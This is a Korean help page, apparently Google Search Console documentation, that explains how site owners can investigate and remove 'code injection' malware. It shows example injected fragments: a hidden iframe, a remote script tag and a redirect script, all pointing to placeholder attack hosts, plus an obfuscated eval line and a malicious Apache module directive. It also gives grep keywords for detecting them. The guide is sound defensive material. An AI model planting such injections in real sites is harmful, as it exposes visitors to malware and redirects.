멀웨어 감염 유형: 코드 삽입

Google Search Console에 멀웨어 감염 유형 '코드 삽입'으로 표시된 페이지가 있다는 것은 무슨 뜻인가요?

사이트의 페이지가 iframe과 같은 악성 코드를 멀웨어 공격 사이트에 포함하도록 수정되었음을 의미합니다.

멀웨어에 관한 일반적인 정보를 더 알아보려면 피해 평가(멀웨어 해킹)를 참조하세요.

'코드 삽입' 멀웨어 유형을 조사하려면 어떻게 해야 하나요?

우선 브라우저를 사용하여 사이트의 해킹된 페이지를 표시하면 안 됩니다. 멀웨어는 주로 브라우저 취약성을 이용하여 전파되므로 감염된 멀웨어 페이지를 브라우저에서 열면 컴퓨터에 피해를 줄 수 있습니다.

cURL 또는 Wget을 사용하여 HTTP 요청(예: 페이지 가져오기)을 수행함으로써 동작을 확인해 봅니다. 이렇게 무료로 사용할 수 있는 도구는 리디렉션 진단에 유용하며 리퍼러 또는 user-agent 정보를 유연하게 포함할 수 있습니다. 해커는 특정 user-agent 또는 리퍼러가 있는 사용자에게만 악성 콘텐츠를 게재함으로써 더 많은 '실제 사용자'를 타겟팅하고 사이트 소유자 및 멀웨어 스캐너로부터 발견되는 것을 더 잘 피할 수 있습니다(이러한 도구를 사용하려면 사이트가 온라인 상태가 되어야 합니다).

예를 들면 다음과 같습니다.

$curl -v --referer <referer-field> --user-agent "Mozilla/5.0 (
  Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" <your-url>
예:
$curl -v --referer "http://www.google.com" --user-agent "Mozilla/5.0 
  (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html

그다음 파일 시스템에 로그인합니다. '코드 삽입'에 감염된 URL에 작성하는 모든 리소스를 조사합니다. 다음은 악성 코드 감염의 예제의 일부입니다.

  • 공격 사이트에 대한 iframe
  • <iframe frameborder="0" height="0" src="http://<attack-site>/path/file" 
      style="display:none" width="0"></iframe>
  • 자바스크립트 또는 공격 사이트에서 스크립트를 호출하고 실행하는 다른 스크립트 언어
  • <script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
  • 브라우저를 공격 사이트로 리디렉션하는 스크립트
  • <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://malware-attack-site/");
      }
    </script>
  • 발견되지 않도록 복잡하게 만들어진 악성 코드
  • eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • 다른 점에서는 무해한 스크립트에 유해 코드를 무작위로 작성하도록 설계된 공유 개체 파일
  • #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

사이트에 표시된 유해한 모든 코드를 조사합니다. iframe 코드를 찾으려면 [iframe]과 같은 단어를 검색하는 것이 도움이 될 수 있습니다. 기타 유용한 키워드에는 'script', 'eval' 및 'unescape'가 있습니다. Unix 기반 시스템에서 예를 들면 다음과 같습니다.

$grep -irn "iframe" ./ | less

사이트에서 '코드 삽입' 멀웨어 유형을 정리하려면 어떻게 해야 하나요?

사이트를 정리할 준비가 되면(해킹된 사이트 관련 도움말의 복구 절차 중 7단계) 영향을 받은 파일을 안전한 최신 백업으로 대체하거나 각 페이지에서 코드 삽입 및 모든 관련 스크립트 함수와 파일을 삭제할 수 있습니다. 서버 설정 파일을 수정한 경우 변경사항을 적용하려면 웹 서버를 다시 시작해야 할 수 있습니다.

악성 코드를 삭제해도 해커가 처음 사이트를 해킹하도록 허용한 근본적인 취약성은 해결되지 않습니다. 근본 원인을 해결하지 않으면 이후에 사이트가 다시 해킹당할 수 있습니다. 이러한 멀웨어 유형뿐 아니라 전체 사이트 정리에 대한 자세한 내용은 해킹된 사이트 관련 도움말5단계: 피해 평가(멀웨어 해킹)에서 특히 '파일 시스템 피해 평가'를 참조하세요.

도움이 되었나요?
어떻게 하면 개선할 수 있을까요?